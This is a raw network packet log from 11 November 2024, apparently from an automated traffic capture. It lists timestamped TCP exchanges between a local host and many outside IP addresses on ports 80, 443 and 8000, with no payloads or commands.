                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.323432922 CET804973364.190.63.136192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.323472023 CET4973380192.168.2.664.190.63.136
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.323591948 CET804973364.190.63.136192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.323617935 CET804973364.190.63.136192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.323641062 CET4973380192.168.2.664.190.63.136
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.323682070 CET4973380192.168.2.664.190.63.136
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.324316025 CET804973364.190.63.136192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.324418068 CET4973380192.168.2.664.190.63.136
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.363195896 CET4973980192.168.2.613.248.169.48
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.368036985 CET804973913.248.169.48192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.368227959 CET4973980192.168.2.613.248.169.48
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.370172024 CET4973980192.168.2.613.248.169.48
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.375188112 CET804973913.248.169.48192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.695869923 CET4974080192.168.2.6188.114.97.3
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.700702906 CET8049740188.114.97.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.700778961 CET4974080192.168.2.6188.114.97.3
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.700877905 CET4974080192.168.2.6188.114.97.3
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.706566095 CET8049740188.114.97.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.801198959 CET804973913.248.169.48192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.801282883 CET4973980192.168.2.613.248.169.48
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.848460913 CET4974580192.168.2.618.208.156.248
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.853343010 CET804974518.208.156.248192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.853420973 CET4974580192.168.2.618.208.156.248
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.853898048 CET4974580192.168.2.618.208.156.248
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.858876944 CET804974518.208.156.248192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.885440111 CET4974680192.168.2.63.94.10.34
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.890268087 CET80497463.94.10.34192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.890327930 CET4974680192.168.2.63.94.10.34
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.890563011 CET4974680192.168.2.63.94.10.34
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.896156073 CET80497463.94.10.34192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:34.292576075 CET804974518.208.156.248192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:34.292654037 CET4974580192.168.2.618.208.156.248
                                                                                                                                                                                                                  Nov 11, 2024 18:50:34.294564962 CET4974580192.168.2.618.208.156.248
                                                                                                                                                                                                                  Nov 11, 2024 18:50:34.299833059 CET804974518.208.156.248192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:34.299902916 CET4974580192.168.2.618.208.156.248
                                                                                                                                                                                                                  Nov 11, 2024 18:50:34.316792965 CET80497463.94.10.34192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:34.316860914 CET4974680192.168.2.63.94.10.34
                                                                                                                                                                                                                  Nov 11, 2024 18:50:34.318566084 CET4974680192.168.2.63.94.10.34
                                                                                                                                                                                                                  Nov 11, 2024 18:50:34.323751926 CET80497463.94.10.34192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:34.323842049 CET4974680192.168.2.63.94.10.34
                                                                                                                                                                                                                  Nov 11, 2024 18:50:34.460958004 CET8049740188.114.97.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:34.461380005 CET4974080192.168.2.6188.114.97.3
                                                                                                                                                                                                                  Nov 11, 2024 18:50:34.461952925 CET8049740188.114.97.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:34.461971998 CET8049740188.114.97.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:34.462060928 CET4974080192.168.2.6188.114.97.3
                                                                                                                                                                                                                  Nov 11, 2024 18:50:34.476684093 CET49748443192.168.2.6188.114.97.3
                                                                                                                                                                                                                  Nov 11, 2024 18:50:34.476711988 CET44349748188.114.97.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:34.476798058 CET49748443192.168.2.6188.114.97.3
                                                                                                                                                                                                                  Nov 11, 2024 18:50:34.477382898 CET49748443192.168.2.6188.114.97.3
                                                                                                                                                                                                                  Nov 11, 2024 18:50:34.477396011 CET44349748188.114.97.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:34.543277025 CET4975380192.168.2.6103.150.10.48
                                                                                                                                                                                                                  Nov 11, 2024 18:50:34.548580885 CET8049753103.150.10.48192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:34.549500942 CET4975380192.168.2.6103.150.10.48
                                                                                                                                                                                                                  Nov 11, 2024 18:50:34.553677082 CET4975380192.168.2.6103.150.10.48
                                                                                                                                                                                                                  Nov 11, 2024 18:50:34.558543921 CET8049753103.150.10.48192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:34.912132025 CET44349748188.114.97.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:34.912503958 CET49748443192.168.2.6188.114.97.3
                                                                                                                                                                                                                  Nov 11, 2024 18:50:34.919389009 CET49748443192.168.2.6188.114.97.3
                                                                                                                                                                                                                  Nov 11, 2024 18:50:34.919409990 CET44349748188.114.97.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:34.919791937 CET44349748188.114.97.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:34.919953108 CET49748443192.168.2.6188.114.97.3
                                                                                                                                                                                                                  Nov 11, 2024 18:50:34.920236111 CET49748443192.168.2.6188.114.97.3
                                                                                                                                                                                                                  Nov 11, 2024 18:50:34.963325977 CET44349748188.114.97.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:35.422513008 CET8049753103.150.10.48192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:35.422578096 CET4975380192.168.2.6103.150.10.48
                                                                                                                                                                                                                  Nov 11, 2024 18:50:35.427051067 CET497598000192.168.2.6106.15.232.163
                                                                                                                                                                                                                  Nov 11, 2024 18:50:35.431988001 CET800049759106.15.232.163192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:35.432065964 CET497598000192.168.2.6106.15.232.163
                                                                                                                                                                                                                  Nov 11, 2024 18:50:35.432241917 CET497598000192.168.2.6106.15.232.163
                                                                                                                                                                                                                  Nov 11, 2024 18:50:35.437155962 CET800049759106.15.232.163192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:36.204205990 CET800049759106.15.232.163192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:36.204322100 CET497598000192.168.2.6106.15.232.163
                                                                                                                                                                                                                  Nov 11, 2024 18:50:36.205785036 CET4975380192.168.2.6103.150.10.48
                                                                                                                                                                                                                  Nov 11, 2024 18:50:36.210752964 CET8049753103.150.10.48192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:36.286870956 CET44349748188.114.97.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:36.286930084 CET49748443192.168.2.6188.114.97.3
                                                                                                                                                                                                                  Nov 11, 2024 18:50:36.286931992 CET44349748188.114.97.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:36.286957026 CET44349748188.114.97.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:36.286971092 CET49748443192.168.2.6188.114.97.3
                                                                                                                                                                                                                  Nov 11, 2024 18:50:36.286994934 CET44349748188.114.97.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:36.287019968 CET49748443192.168.2.6188.114.97.3
                                                                                                                                                                                                                  Nov 11, 2024 18:50:36.287024021 CET44349748188.114.97.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:36.287045002 CET49748443192.168.2.6188.114.97.3
                                                                                                                                                                                                                  Nov 11, 2024 18:50:36.287059069 CET44349748188.114.97.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:36.287074089 CET49748443192.168.2.6188.114.97.3
                                                                                                                                                                                                                  Nov 11, 2024 18:50:36.287076950 CET44349748188.114.97.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:36.287100077 CET49748443192.168.2.6188.114.97.3
                                                                                                                                                                                                                  Nov 11, 2024 18:50:36.287127018 CET49748443192.168.2.6188.114.97.3
                                                                                                                                                                                                                  Nov 11, 2024 18:50:36.288214922 CET44349748188.114.97.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:36.288232088 CET49748443192.168.2.6188.114.97.3
                                                                                                                                                                                                                  Nov 11, 2024 18:50:36.288254023 CET49748443192.168.2.6188.114.97.3
                                                                                                                                                                                                                  Nov 11, 2024 18:50:36.288259983 CET44349748188.114.97.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:36.288269043 CET49748443192.168.2.6188.114.97.3
                                                                                                                                                                                                                  Nov 11, 2024 18:50:36.288302898 CET49748443192.168.2.6188.114.97.3
                                                                                                                                                                                                                  Nov 11, 2024 18:50:36.289581060 CET4974080192.168.2.6188.114.97.3
                                                                                                                                                                                                                  Nov 11, 2024 18:50:36.294531107 CET8049740188.114.97.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:36.525111914 CET8049753103.150.10.48192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:36.525172949 CET4975380192.168.2.6103.150.10.48
                                                                                                                                                                                                                  Nov 11, 2024 18:50:36.545608044 CET497598000192.168.2.6106.15.232.163
                                                                                                                                                                                                                  Nov 11, 2024 18:50:36.550551891 CET800049759106.15.232.163192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:36.618305922 CET8049740188.114.97.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:36.618406057 CET4974080192.168.2.6188.114.97.3
                                                                                                                                                                                                                  Nov 11, 2024 18:50:36.623980999 CET49770443192.168.2.6188.114.97.3
                                                                                                                                                                                                                  Nov 11, 2024 18:50:36.624033928 CET44349770188.114.97.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:36.624094963 CET49770443192.168.2.6188.114.97.3
                                                                                                                                                                                                                  Nov 11, 2024 18:50:36.624342918 CET49770443192.168.2.6188.114.97.3
                                                                                                                                                                                                                  Nov 11, 2024 18:50:36.624356031 CET44349770188.114.97.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:36.811590910 CET800049759106.15.232.163192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:36.811655998 CET497598000192.168.2.6106.15.232.163
                                                                                                                                                                                                                  Nov 11, 2024 18:50:37.057305098 CET44349770188.114.97.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:37.057393074 CET49770443192.168.2.6188.114.97.3
                                                                                                                                                                                                                  Nov 11, 2024 18:50:37.059295893 CET49770443192.168.2.6188.114.97.3
                                                                                                                                                                                                                  Nov 11, 2024 18:50:37.059304953 CET44349770188.114.97.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:37.059552908 CET44349770188.114.97.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:37.059603930 CET49770443192.168.2.6188.114.97.3
                                                                                                                                                                                                                  Nov 11, 2024 18:50:37.060008049 CET49770443192.168.2.6188.114.97.3
                                                                                                                                                                                                                  Nov 11, 2024 18:50:37.107337952 CET44349770188.114.97.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.324146986 CET804973364.190.63.136192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.324326992 CET4973380192.168.2.664.190.63.136
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.639225960 CET44349770188.114.97.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.639281988 CET49770443192.168.2.6188.114.97.3
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.639296055 CET44349770188.114.97.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.639332056 CET49770443192.168.2.6188.114.97.3
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.639337063 CET44349770188.114.97.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.639348030 CET44349770188.114.97.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.639372110 CET49770443192.168.2.6188.114.97.3
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.639417887 CET49770443192.168.2.6188.114.97.3
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.639421940 CET44349770188.114.97.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.639458895 CET49770443192.168.2.6188.114.97.3
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.639463902 CET44349770188.114.97.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.639502048 CET49770443192.168.2.6188.114.97.3
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.639664888 CET44349770188.114.97.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.639703035 CET49770443192.168.2.6188.114.97.3
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.639707088 CET44349770188.114.97.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.639746904 CET49770443192.168.2.6188.114.97.3
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.639754057 CET44349770188.114.97.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.639795065 CET49770443192.168.2.6188.114.97.3
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.639825106 CET49770443192.168.2.6188.114.97.3
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.639854908 CET49770443192.168.2.6188.114.97.3
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.639857054 CET44349770188.114.97.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.639899015 CET49770443192.168.2.6188.114.97.3
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.777275085 CET4978680192.168.2.664.225.91.73
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.782172918 CET804978664.225.91.73192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.782233953 CET4978680192.168.2.664.225.91.73
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.782397985 CET4978680192.168.2.664.225.91.73
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.787197113 CET804978664.225.91.73192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.798789024 CET4978780192.168.2.676.223.67.189
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.803757906 CET804978776.223.67.189192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.803863049 CET4978780192.168.2.676.223.67.189
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.804157019 CET4978780192.168.2.676.223.67.189
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.809003115 CET804978776.223.67.189192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:39.022906065 CET4979380192.168.2.644.221.84.105
                                                                                                                                                                                                                  Nov 11, 2024 18:50:39.027847052 CET804979344.221.84.105192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:39.027919054 CET4979380192.168.2.644.221.84.105
                                                                                                                                                                                                                  Nov 11, 2024 18:50:39.028064966 CET4979380192.168.2.644.221.84.105
                                                                                                                                                                                                                  Nov 11, 2024 18:50:39.032830954 CET804979344.221.84.105192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:39.086862087 CET4979480192.168.2.6103.224.212.210
                                                                                                                                                                                                                  Nov 11, 2024 18:50:39.091824055 CET8049794103.224.212.210192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:39.091931105 CET4979480192.168.2.6103.224.212.210
                                                                                                                                                                                                                  Nov 11, 2024 18:50:39.092050076 CET4979480192.168.2.6103.224.212.210
                                                                                                                                                                                                                  Nov 11, 2024 18:50:39.096865892 CET8049794103.224.212.210192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:39.115353107 CET8049723199.59.243.227192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:39.115405083 CET4972380192.168.2.6199.59.243.227
                                                                                                                                                                                                                  Nov 11, 2024 18:50:39.138246059 CET4979580192.168.2.6103.224.182.252
                                                                                                                                                                                                                  Nov 11, 2024 18:50:39.143143892 CET8049795103.224.182.252192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:39.143215895 CET4979580192.168.2.6103.224.182.252
                                                                                                                                                                                                                  Nov 11, 2024 18:50:39.146969080 CET4979580192.168.2.6103.224.182.252
                                                                                                                                                                                                                  Nov 11, 2024 18:50:39.151823997 CET8049795103.224.182.252192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:39.231462002 CET804978776.223.67.189192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:39.231729031 CET4978780192.168.2.676.223.67.189
                                                                                                                                                                                                                  Nov 11, 2024 18:50:39.256274939 CET4979680192.168.2.6154.85.183.50
                                                                                                                                                                                                                  Nov 11, 2024 18:50:39.261425972 CET8049796154.85.183.50192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:39.261574984 CET4979680192.168.2.6154.85.183.50
                                                                                                                                                                                                                  Nov 11, 2024 18:50:39.266263962 CET4979680192.168.2.6154.85.183.50
                                                                                                                                                                                                                  Nov 11, 2024 18:50:39.271975040 CET8049796154.85.183.50192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:39.332880020 CET804978664.225.91.73192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:39.333074093 CET4978680192.168.2.664.225.91.73
                                                                                                                                                                                                                  Nov 11, 2024 18:50:39.457639933 CET804979344.221.84.105192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:39.459120035 CET4979380192.168.2.644.221.84.105
                                                                                                                                                                                                                  Nov 11, 2024 18:50:39.460990906 CET4979380192.168.2.644.221.84.105
                                                                                                                                                                                                                  Nov 11, 2024 18:50:39.465260029 CET804979344.221.84.105192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:39.465325117 CET4979380192.168.2.644.221.84.105
                                                                                                                                                                                                                  Nov 11, 2024 18:50:39.465801954 CET804979344.221.84.105192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:39.661348104 CET8049794103.224.212.210192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:39.661493063 CET4979480192.168.2.6103.224.212.210
                                                                                                                                                                                                                  Nov 11, 2024 18:50:39.664203882 CET4979480192.168.2.6103.224.212.210
                                                                                                                                                                                                                  Nov 11, 2024 18:50:39.670335054 CET8049794103.224.212.210192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:39.670478106 CET4979480192.168.2.6103.224.212.210
                                                                                                                                                                                                                  Nov 11, 2024 18:50:39.707452059 CET8049795103.224.182.252192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:39.707540989 CET4979580192.168.2.6103.224.182.252
                                                                                                                                                                                                                  Nov 11, 2024 18:50:39.710895061 CET4979580192.168.2.6103.224.182.252
                                                                                                                                                                                                                  Nov 11, 2024 18:50:39.716327906 CET8049795103.224.182.252192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:39.716418982 CET4979580192.168.2.6103.224.182.252
                                                                                                                                                                                                                  Nov 11, 2024 18:50:40.038372040 CET4980280192.168.2.664.190.63.136
                                                                                                                                                                                                                  Nov 11, 2024 18:50:40.043268919 CET804980264.190.63.136192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:40.043607950 CET4980280192.168.2.664.190.63.136
                                                                                                                                                                                                                  Nov 11, 2024 18:50:40.043607950 CET4980280192.168.2.664.190.63.136
                                                                                                                                                                                                                  Nov 11, 2024 18:50:40.048470974 CET804980264.190.63.136192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:40.071571112 CET8049796154.85.183.50192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:40.071995020 CET4979680192.168.2.6154.85.183.50
                                                                                                                                                                                                                  Nov 11, 2024 18:50:40.077390909 CET4979680192.168.2.6154.85.183.50
                                                                                                                                                                                                                  Nov 11, 2024 18:50:40.082288027 CET8049796154.85.183.50192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:40.253906965 CET4980880192.168.2.6199.59.243.227
                                                                                                                                                                                                                  Nov 11, 2024 18:50:40.258992910 CET8049808199.59.243.227192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:40.259192944 CET4980880192.168.2.6199.59.243.227
                                                                                                                                                                                                                  Nov 11, 2024 18:50:40.259344101 CET4980880192.168.2.6199.59.243.227
                                                                                                                                                                                                                  Nov 11, 2024 18:50:40.264197111 CET8049808199.59.243.227192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:40.396037102 CET8049796154.85.183.50192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:40.396287918 CET4979680192.168.2.6154.85.183.50
                                                                                                                                                                                                                  Nov 11, 2024 18:50:40.681955099 CET804980264.190.63.136192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:40.681972980 CET804980264.190.63.136192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:40.682041883 CET4980280192.168.2.664.190.63.136
                                                                                                                                                                                                                  Nov 11, 2024 18:50:40.682041883 CET4980280192.168.2.664.190.63.136
                                                                                                                                                                                                                  Nov 11, 2024 18:50:40.682085037 CET804980264.190.63.136192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:40.682096958 CET804980264.190.63.136192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:40.682110071 CET804980264.190.63.136192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:40.682142019 CET4980280192.168.2.664.190.63.136
                                                                                                                                                                                                                  Nov 11, 2024 18:50:40.682142019 CET4980280192.168.2.664.190.63.136
                                                                                                                                                                                                                  Nov 11, 2024 18:50:40.682252884 CET804980264.190.63.136192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:40.682265043 CET804980264.190.63.136192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:40.682277918 CET804980264.190.63.136192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:40.682288885 CET804980264.190.63.136192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:40.682311058 CET4980280192.168.2.664.190.63.136
                                                                                                                                                                                                                  Nov 11, 2024 18:50:40.682343960 CET4980280192.168.2.664.190.63.136
                                                                                                                                                                                                                  Nov 11, 2024 18:50:40.682368040 CET804980264.190.63.136192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:40.682455063 CET4980280192.168.2.664.190.63.136
                                                                                                                                                                                                                  Nov 11, 2024 18:50:40.685638905 CET8049808199.59.243.227192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:40.685782909 CET4980880192.168.2.6199.59.243.227
                                                                                                                                                                                                                  Nov 11, 2024 18:50:40.685791016 CET8049808199.59.243.227192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:40.686080933 CET4980880192.168.2.6199.59.243.227
                                                                                                                                                                                                                  Nov 11, 2024 18:50:40.687674046 CET804980264.190.63.136192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:40.687766075 CET4980280192.168.2.664.190.63.136
                                                                                                                                                                                                                  Nov 11, 2024 18:50:40.687792063 CET804980264.190.63.136192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:40.687830925 CET4980280192.168.2.664.190.63.136
                                                                                                                                                                                                                  Nov 11, 2024 18:50:40.770411968 CET804980264.190.63.136192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:40.770477057 CET4980280192.168.2.664.190.63.136
                                                                                                                                                                                                                  Nov 11, 2024 18:50:40.770545959 CET804980264.190.63.136192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:40.770558119 CET804980264.190.63.136192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:40.770623922 CET4980280192.168.2.664.190.63.136
                                                                                                                                                                                                                  Nov 11, 2024 18:50:40.770700932 CET804980264.190.63.136192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:40.770770073 CET4980280192.168.2.664.190.63.136
                                                                                                                                                                                                                  Nov 11, 2024 18:50:40.770849943 CET804980264.190.63.136192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:40.770941019 CET4980280192.168.2.664.190.63.136
                                                                                                                                                                                                                  Nov 11, 2024 18:50:40.771421909 CET804980264.190.63.136192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:40.771433115 CET804980264.190.63.136192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:40.771444082 CET804980264.190.63.136192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:40.771493912 CET4980280192.168.2.664.190.63.136
                                                                                                                                                                                                                  Nov 11, 2024 18:50:40.771518946 CET4980280192.168.2.664.190.63.136
                                                                                                                                                                                                                  Nov 11, 2024 18:50:40.771573067 CET804980264.190.63.136192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:40.771584034 CET804980264.190.63.136192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:40.771589994 CET804980264.190.63.136192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:40.771660089 CET4980280192.168.2.664.190.63.136
                                                                                                                                                                                                                  Nov 11, 2024 18:50:40.771660089 CET4980280192.168.2.664.190.63.136
                                                                                                                                                                                                                  Nov 11, 2024 18:50:40.772562981 CET804980264.190.63.136192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:40.772891998 CET4980280192.168.2.664.190.63.136
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.508218050 CET4982180192.168.2.664.225.91.73
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.513077021 CET804982164.225.91.73192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.513156891 CET4982180192.168.2.664.225.91.73
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.513499022 CET4982180192.168.2.664.225.91.73
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.518506050 CET804982164.225.91.73192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.708358049 CET4982280192.168.2.672.52.179.174
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.714518070 CET804982272.52.179.174192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.714674950 CET4982280192.168.2.672.52.179.174
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.718429089 CET4982280192.168.2.672.52.179.174
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.724016905 CET804982272.52.179.174192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.059688091 CET804982164.225.91.73192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.059796095 CET4982180192.168.2.664.225.91.73
                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.207565069 CET804982272.52.179.174192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.207628012 CET4982280192.168.2.672.52.179.174
                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.207729101 CET4982280192.168.2.672.52.179.174
                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.208794117 CET4982980192.168.2.672.52.179.174
                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.212618113 CET804982272.52.179.174192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.214025021 CET804982972.52.179.174192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.214147091 CET4982980192.168.2.672.52.179.174
                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.214312077 CET4982980192.168.2.672.52.179.174
                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.219130039 CET804982972.52.179.174192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.709968090 CET804982972.52.179.174192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.710031033 CET4982980192.168.2.672.52.179.174
                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.710104942 CET4982980192.168.2.672.52.179.174
                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.714981079 CET804982972.52.179.174192.168.2.6
